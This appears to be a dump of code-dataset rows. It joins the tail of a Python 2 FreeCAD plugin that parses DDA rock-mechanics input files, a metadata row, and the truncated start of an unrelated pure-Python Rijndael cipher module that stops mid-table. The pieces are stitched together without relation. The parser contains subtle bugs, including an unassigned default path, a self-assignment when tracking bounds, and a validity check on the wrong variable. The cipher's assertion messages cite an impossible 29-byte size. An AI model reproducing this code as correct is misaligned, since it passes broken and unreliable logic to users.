nums = str.strip().split()
for j in range(4):
tmpNums[j] = self.parseFloatNum(nums[j], 'tunnel ' +names[j])
if tmpNums[j] == None :
return False
# tunnel center
center = [0 , 1]
str = self.__fileReader.getNextLine()
nums = str.strip().split()
for j in range(2):
center[j] = self.parseFloatNum(nums[j], 'tunnel center number')
if center[j] == None :
return False
print 'tunnel %d : (%f , %f , %f , %f , %f , %f , %f)'%(i , shapeNo , tmpNums[0] , tmpNums[1] , tmpNums[2] , tmpNums[3] , center[0] , center[1])
self.__tunnels.append((shapeNo , tmpNums[0] , tmpNums[1] , tmpNums[2] , tmpNums[3] , center[0] , center[1]))
return True
def __parseLines(self ):
'''
parse material lines , addtional lines
'''
tmpNums = range(4)
# additional line
for i in range(self.__addtionalLineNum):
str = self.__fileReader.getNextLine()
nums = str.strip().split()
for j in range(4):
tmpNums[j] = self.parseFloatNum(nums[j], 'additional line coordinate number')
if tmpNums[j] == None :
return False
materialNo = self.parseFloatNum(nums[4], 'additional line material number')
if materialNo == None :
return False
print 'additional line %d :(%f , %f , %f , %f , %f)'%(i , tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , materialNo)
self.__additionalLines.append((tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , materialNo))
# material line
for i in range(self.__materialLineNum):
str = self.__fileReader.getNextLine()
nums = str.strip().split()
for j in range(4):
tmpNums[j] = self.parseFloatNum(nums[j], 'material line coordinate number')
if tmpNums[j] == None :
return False
materialNo = self.parseFloatNum(nums[4], 'block material number')
if materialNo == None :
return False
print 'block material %d :(%f , %f , %f , %f , %f)'%(i , tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , materialNo)
self.__materialLines.append((tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , materialNo))
# bolt elements
for i in range(self.__boltElementNum):
str = self.__fileReader.getNextLine()
nums = str.strip().split()
for j in range(4):
tmpNums[j] = self.parseFloatNum(nums[j], 'bolt element coordinate number')
if tmpNums[j] == None :
return False
e0 = self.parseFloatNum(nums[4], 'bolt element e0')
t0 = self.parseFloatNum(nums[5], 'bolt element t0')
f0 = self.parseFloatNum(nums[6], 'bolt element f0')
if materialNo == None :
return False
print 'block material %d :(%f , %f , %f , %f , %f , %f , %f)'%(i , tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , e0 , t0 , f0)
self.__boltElements.append((tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , e0 , t0 , f0))
return True
def __parsePoints(self):
'''
parse points , fixed points , loading points , measured points , hole points
:param file: input dl file
'''
tmpNums = range(4)
# fixed points
for i in range(self.__fixedPointNum):
str = self.__fileReader.getNextLine()
nums = str.strip().split()
for j in range(4):
tmpNums[j] = self.parseFloatNum(nums[j], 'fixed point coordinate number')
if tmpNums[j] == None :
return False
print 'fixed line %d : (%f , %f , %f , %f)'%(i , tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3])
self.__fixedPoints.append((tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3]))
# measured points
itemNames = ['loading point' , 'measured point' , 'hole point']
realNums = [self.__loadingPointNum , self.__measuredPointNum , self.__holePointNum]
for k in range(len(itemNames)):
for i in range(realNums[k]):
str = self.__fileReader.getNextLine()
nums = str.strip().split()
for j in range(2):
tmpNums[j] = self.parseFloatNum(nums[j], itemNames[k] +' coordinate number')
if tmpNums[j] == None :
return False
print '%s %d : (%f , %f)'%(itemNames[k] , i , tmpNums[0] , tmpNums[1])
if k==0 : self.__loadingPoints.append((tmpNums[0] , tmpNums[1]))
elif k==1 : self.__measuredPoints.append((tmpNums[0] , tmpNums[1]))
elif k==2 : self.__holePoints.append((tmpNums[0] , tmpNums[1]))
return True
def __parsePandect(self):
'''
parse Numbers , for example , number of joint set
'''
self.__miniLength = self.parseFloatNum(self.__fileReader.getNextLine(), 'minimun edge length')
if self.__miniLength == None :
return False
self.__jointSetNum = self.parseIntNum(self.__fileReader.getNextLine(), 'joint set number')
if self.__jointSetNum == None:
return False
self.__boundaryNodeNum = self.parseIntNum(self.__fileReader.getNextLine(), 'boundary line number')
if self.__boundaryNodeNum == None:
return False
self.__tunnelNum = self.parseIntNum(self.__fileReader.getNextLine(), 'tunnel number')
if self.__tunnelNum == None:
return False
self.__addtionalLineNum = self.parseIntNum(self.__fileReader.getNextLine(), 'additional line number')
if self.__addtionalLineNum == None:
return False
self.__materialLineNum = self.parseIntNum(self.__fileReader.getNextLine(), 'material line number')
if self.__materialLineNum == None:
return False
self.__boltElementNum = self.parseIntNum(self.__fileReader.getNextLine(), 'bolt element number')
if self.__boltElementNum == None:
return False
self.__fixedPointNum = self.parseIntNum(self.__fileReader.getNextLine(), 'fixed point number')
if self.__fixedPointNum == None:
return False
self.__loadingPointNum = self.parseIntNum(self.__fileReader.getNextLine(), 'loading point number')
if self.__loadingPointNum == None:
return False
self.__measuredPointNum = self.parseIntNum(self.__fileReader.getNextLine(), 'measured point number')
if self.__measuredPointNum == None:
return False
self.__holePointNum = self.parseIntNum(self.__fileReader.getNextLine(), 'hole point number')
if self.__holePointNum == None:
return False
return True
def save2Database(self):
'''
save data to DDADatabase.dl_database
'''
from DDAShapes import DDAJointSets , DDATunnels
DDADatabase.dl_database = DDADatabase.DLDatabase()
database = DDADatabase.dl_database
database.jointSets = self.__jointSets
DDAJointSets.dataTable.refreshData(database.jointSets)
database.slope = self.__slope
DDAJointSets.slopeDataTable.refreshData(database.slope)
database.tunnels = self.__tunnels
DDATunnels.dataTable.refreshData(database.tunnels)
# boundaryNodes
pts = [tuple(p) for p in self.__boundaryNodes]
pts.append(pts[0])
database.boundaryNodes = [DDAPolyLine( pts, 1)]
# additional lines
database.additionalLines = \
[DDALine((p[0],p[1],0) , (p[2],p[3],0) , p[4]) for p in self.__additionalLines]
# material line
database.materialLines = \
[DDALine((p[0],p[1],0) , (p[2],p[3],0) , p[4]) for p in self.__materialLines]
# bolt element
database.boltElements = \
[BoltElement((p[0],p[1],0) , (p[2],p[3],0) , p[4] , p[5] , p[6]) for p in self.__boltElements]
# points
database.fixedPoints = [DDAPoint(t[0],t[1]) for t in self.__fixedPoints]
database.loadingPoints = [DDAPoint(t[0],t[1]) for t in self.__loadingPoints]
database.measuredPoints = [DDAPoint(t[0],t[1]) for t in self.__measuredPoints]
database.holePoints = [DDAPoint(t[0],t[1]) for t in self.__holePoints]
self.reset()
import Base
Base.refreshAllShapes()
class ParseDFInputParameters(BaseParseData):
def __init__(self):
self.__file = None
self.reset()
def reset(self):
from DDADatabase import df_inputDatabase
self.paras = df_inputDatabase.paras
self.paras.reset()
def __parseParaSchema(self):
'''
parse parameters from DF parameters file
:param infile:
'''
for i in range(7):
line = self.__file.getNextLine()
t =self.parseFloatNum(line)
if t==None: return False
if i==0: self.paras.ifDynamic = float(t)
elif i==1: self.paras.stepsNum = int(t)
elif i==2: self.paras.blockMatsNum = int(t)
elif i==3: self.paras.jointMatsNum = int(t)
elif i==4: self.paras.ratio = t
elif i==5: self.paras.OneSteptimeLimit = int(t)
else: self.paras.springStiffness = int(t)
print 'DF Para : IfDynamic: %d steps: %d blockMats: %d JointMats: %d Ratio: %f timeInterval: %d stiffness: %d'\
%(self.paras.ifDynamic, self.paras.stepsNum , self.paras.blockMatsNum , self.paras.jointMatsNum \
, self.paras.ratio, self.paras.OneSteptimeLimit, self.paras.springStiffness)
print 'Df parameters schema done'
return True
def __parsePointsParameters(self):
'''
parse parameters for fixed points and loading points
:param infile:
'''
# parse fixed points and loading points' type 0 : fixed points , 2: loading points
# fixed points
from DDADatabase import df_inputDatabase
if len(df_inputDatabase.fixedPoints)>0:
line = self.__file.getNextLine()
nums = line.split()
for i in nums:
if self.parseIntNum(i)==None :
return False
print nums
# loading points
if len(df_inputDatabase.loadingPoints)>0:
line = self.__file.getNextLine()
nums = line.split()
for i in nums:
if self.parseIntNum(i)==None :
return False
print nums
# parse loading points parameters (starttime , stressX , stressY , endtime , stressX , stressY)
for i in range(len(df_inputDatabase.loadingPoints)):
digits = [1]*6
line1 = self.__file.getNextLine()
nums1 = line1.split()
line2 = self.__file.getNextLine()
nums2 = line2.split()
for j in range(3):
digits[j] = self.parseIntNum(nums1[j])
digits[j+3] = self.parseIntNum(nums2[j])
if None in digits:
return False
self.paras.loadingPointMats.append(digits)
print nums1 , nums2
print 'fixed points and loading points done.'
return True
def __parseBlocksAndJointsPara(self):
'''
parse parameters for blocks and joints'
:param infile:
'''
for i in range(self.paras.blockMatsNum):
digits = [1]*14
line1 = self.__file.getNextLine()
nums1 = line1.split()
for j in range(5):
digits[j] = self.parseFloatNum(nums1[j])
line2 = self.__file.getNextLine()
nums2 = line2.split()
line3 = self.__file.getNextLine()
nums3 = line3.split()
line4 = self.__file.getNextLine()
nums4 = line4.split()
for j in range(3):
digits[j+5] = self.parseFloatNum(nums2[j])
digits[j+8] = self.parseFloatNum(nums3[j])
digits[j+11] = self.parseFloatNum(nums4[j])
if None in digits:
return False
self.paras.blockMats.append(digits)
print digits
for i in range(self.paras.jointMatsNum):
digits = [1]*3
line = self.__file.getNextLine()
nums = line.split()
for j in range(3):
digits[j] = self.parseFloatNum(nums[j])
if None in digits:
return False
self.paras.jointMats.append(digits)
print digits
print 'DF blocks and block vertices\' parameters done.'
return True
def __parseRestPara(self ):
'''
parse SOR and axes
:param infile:
'''
# parse SOR
line = self.__file.getNextLine()
self.paras.SOR = self.parseFloatNum(line)
if self.paras.SOR==None: return False
print 'SOR : ' , self.paras.SOR
line = self.__file.getNextLine()
nums = line.split()
for i in range(3):
if self.parseFloatNum(nums[i])==None:
return False
print nums
print 'DF parameters all done.'
return True
def parse(self , path = None):
self.reset()
if not path: Base.__currentProjectPath__+'/parameters.df'
if not checkFileExists(path):
return False
import Base
self.__file = FileReader()
self.__file.setFile(path)
if not self.__parseParaSchema() or not self.__parsePointsParameters() \
or not self.__parseBlocksAndJointsPara() or not self.__parseRestPara():
return False
return True
class ParseDFInputGraphData(BaseParseData):
def __init__(self):
self.__fileReader = None
def GetResources(self):
return {
'Pixmap' : 'LoadDFInput',
'MenuText': 'LoadDFInputData',
'ToolTip': "Load DF Input Data"}
def Activated(self):
self.parse()
import Base
Base.changeStep4Stage('ShapesAvailable')
def finish(self):
pass
def parse(self , path=None):
self.refreshBlocksData()
import Base
if not path : path = Base.__currentProjectPath__+'/data.df'
if not checkFileExists(path):
return False
file = open(path , "rb")
if not self.__parseDataSchema(file) or not self.__parseBlocks(file) or \
not self.__parseBlockVertices(file) or not self.__parseBoltElements(file) \
or not self.__parsePoints(file):
Base.showErrorMessageBox("DataError", 'Data input unvalid')
return False
return True
def refreshBlocksData(self):
import Base
self.graph = Base.getDatabaser4CurrentStage()
self.graph.reset()
self.blocksNum = 0
self.blockVerticesNum = 0
self.fixedPointsNum = 0
self.loadingPointsNum = 0
self.measuredPointsNum = 0
self.boltElementsNum = 0
def __parseDataSchema(self , infile):
line = infile.readline()
nums = line.split()
self.blocksNum = self.parseIntNum(nums[0])
self.boltElementsNum = self.parseIntNum(nums[1])
self.blockVerticesNum = self.parseIntNum(nums[2])
line = infile.readline()
nums = line.split()
self.fixedPointsNum = self.parseIntNum(nums[0])
self.loadingPointsNum = self.parseIntNum(nums[1])
self.measuredPointsNum = self.parseIntNum(nums[2])
if None in [self.blocksNum , self.boltElementsNum , self.blockVerticesNum \
, self.fixedPointsNum , self.loadingPointsNum , self.measuredPointsNum]:
return False
print 'DF data : blocks : %d bolts : %d vertices : %d fixed Pnts :%d LoadingPnts :%d MeasuredPnts: %d' \
%(self.blocksNum , self.boltElementsNum , self.blockVerticesNum \
, self.fixedPointsNum , self.loadingPointsNum , self.measuredPointsNum)
return True
def __parseBlocks(self , infile):
'''
parsing blocks and try to get the maximum material No
:param infile:
'''
from DDADatabase import df_inputDatabase
df_inputDatabase.blockMatCollections = set()
blockMatCollection = df_inputDatabase.blockMatCollections
for i in range(0 , self.blocksNum):
line = infile.readline()
nums = line.split()
# get blocks' vertices' material No
t0 = self.parseIntNum(nums[0])
t1 = self.parseIntNum(nums[1])
t2 = self.parseIntNum(nums[2])
if t0==None or t1==None or t2==None:
return False
tmpB = Block()
tmpB.materialNo = t0
tmpB.startNo = t1
tmpB.endNo = t2
blockMatCollection.add(t0)
self.graph.blocks.append(tmpB )
# print line ,
print 'DF blocks Info done.'
return True
def __parseBlockVertices(self,infile):
'''
parsing blocks' vertices and try to get the maximum material No
:param infile:
'''
from DDADatabase import df_inputDatabase
df_inputDatabase.jointMatCollections =set()
jointMatCollection = df_inputDatabase.jointMatCollections
ptsBounds = range(4)
for i in range(self.blocksNum):
tmpB = self.graph.blocks[i]
for j in range(int(tmpB.endNo) - int(tmpB.startNo) +1): # read blocks vertices
line = infile.readline()
# print line
nums = line.split()
# get joint material No
t0 = int(self.parseFloatNum(nums[0]))
t1 = self.parseFloatNum(nums[1])
t2 = self.parseFloatNum(nums[2])
if t0==None or t1==None or t2==None:
return False
tmpB.vertices.append( (t0,t1,t2) )
jointMatCollection.add(t0)
# get vertices' value boundary
if i==0:
ptsBounds[0]=ptsBounds[1] = t1
ptsBounds[2]=ptsBounds[2] = t2
else:
if t1<ptsBounds[0]: ptsBounds[0]=t1
elif t1>ptsBounds[1]: ptsBounds[1]=t1
elif t2<ptsBounds[2]: ptsBounds[2]=t2
elif t2>ptsBounds[3]: ptsBounds[3]=t2
for i in range(4): # block parameters
line = infile.readline()
# print line
nums = line.split()
t0 = self.parseFloatNum(nums[0])
t1 = self.parseFloatNum(nums[1])
t2 = self.parseFloatNum(nums[2])
if t0==None or t1==None or t2==None:
return False
tmpB.parameters.extend([t0,t1,t2])
import Base
margin = ptsBounds[1]-ptsBounds[0]
if margin > (ptsBounds[3]-ptsBounds[2]):
margin = ptsBounds[3]-ptsBounds[2]
Base.__radius4Points__ = margin/60
print 'DF blocks vertices data done.'
return True
def __parseBoltElements(self , infile):
for i in range(self.boltElementsNum):
for j in range(3):
line = infile.readline()
print ' %d bolt elements parsed done'%self.boltElementsNum
return True
def parse1Point(self , line , point):
#print line ,
nums = line.split()
point.x = self.parseFloatNum(nums[0])
point.y = self.parseFloatNum(nums[1])
point.blockNo = int(self.parseFloatNum(nums[2]))
def __parsePoints(self , infile):
'''
parsing fixed , loading , and measured points
:param infile:
'''
for i in range(self.fixedPointsNum):
pnt = FixedPoint()
line = infile.readline()
self.parse1Point(line , pnt)
self.graph.fixedPoints.append(pnt)
print ' fixed points : %d done'%self.fixedPointsNum
for i in range(self.loadingPointsNum):
pnt = LoadingPoint()
line = infile.readline()
self.parse1Point(line , pnt)
self.graph.loadingPoints.append(pnt)
print ' loading points : %d done'%self.loadingPointsNum
for i in range(self.measuredPointsNum):
pnt = MeasuredPoint()
line = infile.readline()
self.parse1Point(line , pnt)
self.graph.measuredPoints.append(pnt)
print ' measured points : %d done'%self.measuredPointsNum
print 'DF points done.'
return True
class ParseAndLoadDCInputData(BaseParseData):
def __init__(self):
self.reset()
self.__fileReader = FileReader()
self.database = None
def GetResources(self):
return {
'Pixmap' : 'LoadDCInput',
'MenuText': 'LoadDCInputData',
'ToolTip': "Load DC Input Data"}
def Activated(self):
self.parse()
import Base
Base.changeStep4Stage('SpecialStep')
import Base
database = Base.getDatabaser4CurrentStage()
database.clearRedoUndoList()
def finish(self):
pass
def reset(self):
self.jointLinesNum = 0
self.materialLinesNum = 0
self.additionalLinesNum = 0
self.boltElementsNum = 0
self.fixedPointsNum = 0
self.loadingPointsNum = 0
self.measuredPointsNum = 0
self.holePointsNum = 0
def __ParsePandect(self):
# from DDADatabase import dc_inputDatabase
self.__fileReader.getNextLine() # minimum edge length e0
nums = self.__fileReader.getNextLine().split()
self.jointLinesNum = self.parseIntNum(nums[0])
# temperary code, I will try to revise this if I fully understand the data.dc
self.database.boundaryLinesNum = self.parseIntNum(nums[1])
nums = self.__fileReader.getNextLine()
self.materialLinesNum = self.parseIntNum(nums)
nums = self.__fileReader.getNextLine()
self.boltElementsNum = self.parseIntNum(nums)
nums = self.__fileReader.getNextLine()
self.fixedPointsNum = self.parseIntNum(nums)
nums = self.__fileReader.getNextLine()
self.loadingPointsNum = self.parseIntNum(nums)
nums = self.__fileReader.getNextLine()
self.measuredPointsNum = self.parseIntNum(nums)
nums = self.__fileReader.getNextLine()
self.holePointsNum = self.parseIntNum(nums)
def __parseLines(self):
# from DDADatabase import dc_inputDatabase
# joint lines
self.database.jointLines = []
for i in range(self.jointLinesNum):
nums = self.__fileReader.getNextLine().split()
jointMaterial = int(self.parseFloatNum(nums[4]))
p1 = ( self.parseFloatNum(nums[0]) , self.parseFloatNum(nums[1]) , 0 )
p2 = ( self.parseFloatNum(nums[2]) , self.parseFloatNum(nums[3]) , 0 )
self.database.jointLines.append(DDALine(p1 , p2 , jointMaterial))
# material lines
self.database.materialLines = []
for i in range(self.materialLinesNum):
self.__fileReader.getNextLine()
# bolt elements
tmpNums = range(4)
self.database.boltElements = []
for i in range(self.boltElementsNum):
nums = self.__fileReader.getNextLine().split()
for j in range(4):
tmpNums[j] = self.parseFloatNum(nums[j], 'bolt element coordinate number')
if tmpNums[j] == None :
return False
e0 = self.parseFloatNum(nums[4], 'bolt element e0')
t0 = self.parseFloatNum(nums[5], 'bolt element t0')
f0 = self.parseFloatNum(nums[6], 'bolt element f0')
if e0==None or t0==None or f0==None :
return False
print 'block material %d :(%f , %f , %f , %f , %f , %f , %f)'%(i , tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , e0 , t0 , f0)
self.database.boltElements.append(BoltElement(tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , e0 , t0 , f0))
def __parsePoints(self):
# from DDADatabase import dc_inputDatabase
import Base
# fixed points
windowInfo = [0 , 0 , 0 , 0]
nums = self.__fileReader.getNextLine().split()
p = (self.parseFloatNum(nums[0]) , self.parseFloatNum(nums[1]) , 0)
self.database.fixedPoints.append( FixedPoint(p[0] , p[1]))
windowInfo[0] = windowInfo[1] = p[0]
windowInfo[2] = windowInfo[3] = p[1]
for i in range(self.fixedPointsNum-1):
nums = self.__fileReader.getNextLine().split()
p = (self.parseFloatNum(nums[0]) , self.parseFloatNum(nums[1]) , 0)
if p[0]<windowInfo[0]:windowInfo[0] = p[0]
if p[0]>windowInfo[1]:windowInfo[1] = p[0]
if p[1]<windowInfo[2]:windowInfo[2] = p[1]
if p[1]>windowInfo[3]:windowInfo[3] = p[1]
self.database.fixedPoints.append( FixedPoint(p[0] , p[1]))
Base.__radius4Points__ = (windowInfo[1] - windowInfo[0]) * 0.01
Base.__windowInfo__ = windowInfo
# loading points
for i in range(self.loadingPointsNum):
nums = self.__fileReader.getNextLine().split()
self.database.loadingPoints.append( \
LoadingPoint(self.parseFloatNum(nums[0]) , self.parseFloatNum(nums[1])))
# measured points
for i in range(self.measuredPointsNum):
nums = self.__fileReader.getNextLine().split()
self.database.measuredPoints.append( \
MeasuredPoint(self.parseFloatNum(nums[0]) , self.parseFloatNum(nums[1])))
# hole points
for i in range(self.holePointsNum):
nums = self.__fileReader.getNextLine().split()
self.database.holePoints.append( \
HolePoint(self.parseFloatNum(nums[0]) , self.parseFloatNum(nums[1])))
def parse(self):
import Base
filename = Base.__currentProjectPath__ + '/data.dc'
print 'try to read DC data from file : ' , filename
# filename = Base.__currentProjectPath__ + '/tmpData.dc'
self.__fileReader.setFile(filename)
import DDADatabase
self.database = DDADatabase.DCInputDatabase()
self.reset()
self.__ParsePandect()
self.__parseLines()
self.__parsePoints()
self.__fileReader.closeFile()
DDADatabase.dc_inputDatabase = self.database
self.database = None
class DDALoadData():
def __init__(self):
self.current_path = Base.__currentProjectPath__
def changeStage( self ):
if Base.__currentStage__ == 'DL': # DL stage
print 'switch to DL stage'
self.parseData = ParseAndLoadDLData()
elif Base.__currentStage__ == 'DC': # DC stage
pass
def GetResources(self):
return {
'MenuText': 'Load',
'ToolTip': "Load DL data."}
def __storeFileName(self , filename):
'''
store the name of file which is being loaded
'''
file = open(self.current_path+'\\Ff.c' , 'wb')
file.write(filename.strip().split('/')[-1])
file.close()
def __confirmLoadFile(self):
'''
if a new data file loaded , old shapes will be cleared , so before this ,we have to make sure if user want to do this.
'''
box = QtGui.QMessageBox()
box.setText('New data will be imported , and old shapes will be wipped.')
box.setInformativeText('Do you want to do this?')
box.setStandardButtons(QtGui.QMessageBox.Ok | QtGui.QMessageBox.Cancel)
box.setDefaultButton(QtGui.QMessageBox.Ok)
ret = box.exec_()
if ret == QtGui.QMessageBox.Ok:
return True
return False
def Activated(self):
self.changeStage()
filename = str( QtGui.QFileDialog.getOpenFileName(None , 'please select input file' , self.current_path) )
if not self.parseData.parse(filename):
self.parseData.reset()
print 'input data status : invalid'
return False
print 'input data status : ok'
if self.__confirmLoadFile():
self.__storeFileName(filename)
self.parseData.save2Database()
FreeCADGui.DDADisplayCmd.preview()
def finish(self):
pass
FreeCADGui.addCommand('DDA_LoadDLInputData', ParseAndLoadDLData())
FreeCADGui.addCommand('DDA_Load', DDALoadData())
FreeCADGui.addCommand('DDA_LoadDCInputData', ParseAndLoadDCInputData())
FreeCADGui.addCommand('DDA_LoadDFInputGraphData', ParseDFInputGraphData())
|
lgpl-2.1
| -3,771,634,351,096,124,000
| 36.414041
| 156
| 0.529423
| false
| 3.983707
| false
| false
| false
|
TheDSCPL/SSRE_2017-2018_group8
|
Projeto/Python/cryptopy/crypto/cipher/rijndael.py
|
1
|
14718
|
# -*- coding: utf-8 -*-
""" crypto.cipher.rijndael
Rijndael encryption algorithm
This byte oriented implementation is intended to closely
match FIPS specification for readability. It is not implemented
for performance.
Copyright © (c) 2002 by Paul A. Lambert
Read LICENSE.txt for license information.
2002-06-01
"""
from crypto.cipher.base import BlockCipher, padWithPadLen, noPadding
class Rijndael(BlockCipher):
""" Rijndael encryption algorithm """
def __init__(self, key = None, padding = padWithPadLen(), keySize=16, blockSize=16 ):
self.name = 'RIJNDAEL'
self.keySize = keySize
self.strength = keySize*8
self.blockSize = blockSize # blockSize is in bytes
self.padding = padding # change default to noPadding() to get normal ECB behavior
assert( keySize%4==0 and NrTable[4].has_key(keySize/4)),'key size must be 16,20,24,29 or 32 bytes'
assert( blockSize%4==0 and NrTable.has_key(blockSize/4)), 'block size must be 16,20,24,29 or 32 bytes'
self.Nb = self.blockSize/4 # Nb is number of columns of 32 bit words
self.Nk = keySize/4 # Nk is the key length in 32-bit words
self.Nr = NrTable[self.Nb][self.Nk] # The number of rounds (Nr) is a function of
# the block (Nb) and key (Nk) sizes.
if key != None:
self.setKey(key)
def setKey(self, key):
""" Set a key and generate the expanded key """
assert( len(key) == (self.Nk*4) ), 'Key length must be same as keySize parameter'
self.__expandedKey = keyExpansion(self, key)
self.reset() # BlockCipher.reset()
def encryptBlock(self, plainTextBlock):
""" Encrypt a block, plainTextBlock must be a array of bytes [Nb by 4] """
self.state = self._toBlock(plainTextBlock)
AddRoundKey(self, self.__expandedKey[0:self.Nb])
for round in range(1,self.Nr): #for round = 1 step 1 to Nr1
SubBytes(self)
ShiftRows(self)
MixColumns(self)
AddRoundKey(self, self.__expandedKey[round*self.Nb:(round+1)*self.Nb])
SubBytes(self)
ShiftRows(self)
AddRoundKey(self, self.__expandedKey[self.Nr*self.Nb:(self.Nr+1)*self.Nb])
return self._toBString(self.state)
def decryptBlock(self, encryptedBlock):
""" decrypt a block (array of bytes) """
self.state = self._toBlock(encryptedBlock)
AddRoundKey(self, self.__expandedKey[self.Nr*self.Nb:(self.Nr+1)*self.Nb])
for round in range(self.Nr-1,0,-1):
InvShiftRows(self)
InvSubBytes(self)
AddRoundKey(self, self.__expandedKey[round*self.Nb:(round+1)*self.Nb])
InvMixColumns(self)
InvShiftRows(self)
InvSubBytes(self)
AddRoundKey(self, self.__expandedKey[0:self.Nb])
return self._toBString(self.state)
def _toBlock(self, bs):
""" Convert binary string to array of bytes, state[col][row]"""
assert ( len(bs) == 4*self.Nb ), 'Rijndarl blocks must be of size blockSize'
return [[ord(bs[4*i]),ord(bs[4*i+1]),ord(bs[4*i+2]),ord(bs[4*i+3])] for i in range(self.Nb)]
def _toBString(self, block):
""" Convert block (array of bytes) to binary string """
l = []
for col in block:
for rowElement in col:
l.append(chr(rowElement))
return ''.join(l)
#-------------------------------------
""" Number of rounds Nr = NrTable[Nb][Nk]
Nb Nk=4 Nk=5 Nk=6 Nk=7 Nk=8
------------------------------------- """
NrTable = {4: {4:10, 5:11, 6:12, 7:13, 8:14},
5: {4:11, 5:11, 6:12, 7:13, 8:14},
6: {4:12, 5:12, 6:12, 7:13, 8:14},
7: {4:13, 5:13, 6:13, 7:13, 8:14},
8: {4:14, 5:14, 6:14, 7:14, 8:14}}
#-------------------------------------
def keyExpansion(algInstance, keyString):
""" Expand a string of size keySize into a larger array """
Nk, Nb, Nr = algInstance.Nk, algInstance.Nb, algInstance.Nr # for readability
key = [ord(byte) for byte in keyString] # convert string to list
w = [[key[4*i],key[4*i+1],key[4*i+2],key[4*i+3]] for i in range(Nk)]
for i in range(Nk,Nb*(Nr+1)):
temp = w[i-1] # a four byte column
if (i%Nk) == 0 :
temp = temp[1:]+[temp[0]] # RotWord(temp)
temp = [ Sbox[byte] for byte in temp ]
temp[0] ^= Rcon[i/Nk]
elif Nk > 6 and i%Nk == 4 :
temp = [ Sbox[byte] for byte in temp ] # SubWord(temp)
w.append( [ w[i-Nk][byte]^temp[byte] for byte in range(4) ] )
return w
Rcon = (0,0x01,0x02,0x04,0x08,0x10,0x20,0x40,0x80,0x1b,0x36, # note extra '0' !!!
0x6c,0xd8,0xab,0x4d,0x9a,0x2f,0x5e,0xbc,0x63,0xc6,
0x97,0x35,0x6a,0xd4,0xb3,0x7d,0xfa,0xef,0xc5,0x91)
#-------------------------------------
def AddRoundKey(algInstance, keyBlock):
""" XOR the algorithm state with a block of key material """
for column in range(algInstance.Nb):
for row in range(4):
algInstance.state[column][row] ^= keyBlock[column][row]
#-------------------------------------
def SubBytes(algInstance):
for column in range(algInstance.Nb):
for row in range(4):
algInstance.state[column][row] = Sbox[algInstance.state[column][row]]
def InvSubBytes(algInstance):
for column in range(algInstance.Nb):
for row in range(4):
algInstance.state[column][row] = InvSbox[algInstance.state[column][row]]
Sbox = (0x63,0x7c,0x77,0x7b,0xf2,0x6b,0x6f,0xc5,
0x30,0x01,0x67,0x2b,0xfe,0xd7,0xab,0x76,
0xca,0x82,0xc9,0x7d,0xfa,0x59,0x47,0xf0,
0xad,0xd4,0xa2,0xaf,0x9c,0xa4,0x72,0xc0,
0xb7,0xfd,0x93,0x26,0x36,0x3f,0xf7,0xcc,
0x34,0xa5,0xe5,0xf1,0x71,0xd8,0x31,0x15,
0x04,0xc7,0x23,0xc3,0x18,0x96,0x05,0x9a,
0x07,0x12,0x80,0xe2,0xeb,0x27,0xb2,0x75,
0x09,0x83,0x2c,0x1a,0x1b,0x6e,0x5a,0xa0,
0x52,0x3b,0xd6,0xb3,0x29,0xe3,0x2f,0x84,
0x53,0xd1,0x00,0xed,0x20,0xfc,0xb1,0x5b,
0x6a,0xcb,0xbe,0x39,0x4a,0x4c,0x58,0xcf,
0xd0,0xef,0xaa,0xfb,0x43,0x4d,0x33,0x85,
0x45,0xf9,0x02,0x7f,0x50,0x3c,0x9f,0xa8,
0x51,0xa3,0x40,0x8f,0x92,0x9d,0x38,0xf5,
0xbc,0xb6,0xda,0x21,0x10,0xff,0xf3,0xd2,
0xcd,0x0c,0x13,0xec,0x5f,0x97,0x44,0x17,
0xc4,0xa7,0x7e,0x3d,0x64,0x5d,0x19,0x73,
0x60,0x81,0x4f,0xdc,0x22,0x2a,0x90,0x88,
0x46,0xee,0xb8,0x14,0xde,0x5e,0x0b,0xdb,
0xe0,0x32,0x3a,0x0a,0x49,0x06,0x24,0x5c,
0xc2,0xd3,0xac,0x62,0x91,0x95,0xe4,0x79,
0xe7,0xc8,0x37,0x6d,0x8d,0xd5,0x4e,0xa9,
0x6c,0x56,0xf4,0xea,0x65,0x7a,0xae,0x08,
0xba,0x78,0x25,0x2e,0x1c,0xa6,0xb4,0xc6,
0xe8,0xdd,0x74,0x1f,0x4b,0xbd,0x8b,0x8a,
0x70,0x3e,0xb5,0x66,0x48,0x03,0xf6,0x0e,
0x61,0x35,0x57,0xb9,0x86,0xc1,0x1d,0x9e,
0xe1,0xf8,0x98,0x11,0x69,0xd9,0x8e,0x94,
0x9b,0x1e,0x87,0xe9,0xce,0x55,0x28,0xdf,
0x8c,0xa1,0x89,0x0d,0xbf,0xe6,0x42,0x68,
0x41,0x99,0x2d,0x0f,0xb0,0x54,0xbb,0x16)
InvSbox = (0x52,0x09,0x6a,0xd5,0x30,0x36,0xa5,0x38,
0xbf,0x40,0xa3,0x9e,0x81,0xf3,0xd7,0xfb,
0x7c,0xe3,0x39,0x82,0x9b,0x2f,0xff,0x87,
0x34,0x8e,0x43,0x44,0xc4,0xde,0xe9,0xcb,
0x54,0x7b,0x94,0x32,0xa6,0xc2,0x23,0x3d,
0xee,0x4c,0x95,0x0b,0x42,0xfa,0xc3,0x4e,
0x08,0x2e,0xa1,0x66,0x28,0xd9,0x24,0xb2,
0x76,0x5b,0xa2,0x49,0x6d,0x8b,0xd1,0x25,
0x72,0xf8,0xf6,0x64,0x86,0x68,0x98,0x16,
0xd4,0xa4,0x5c,0xcc,0x5d,0x65,0xb6,0x92,
0x6c,0x70,0x48,0x50,0xfd,0xed,0xb9,0xda,
0x5e,0x15,0x46,0x57,0xa7,0x8d,0x9d,0x84,
0x90,0xd8,0xab,0x00,0x8c,0xbc,0xd3,0x0a,
0xf7,0xe4,0x58,0x05,0xb8,0xb3,0x45,0x06,
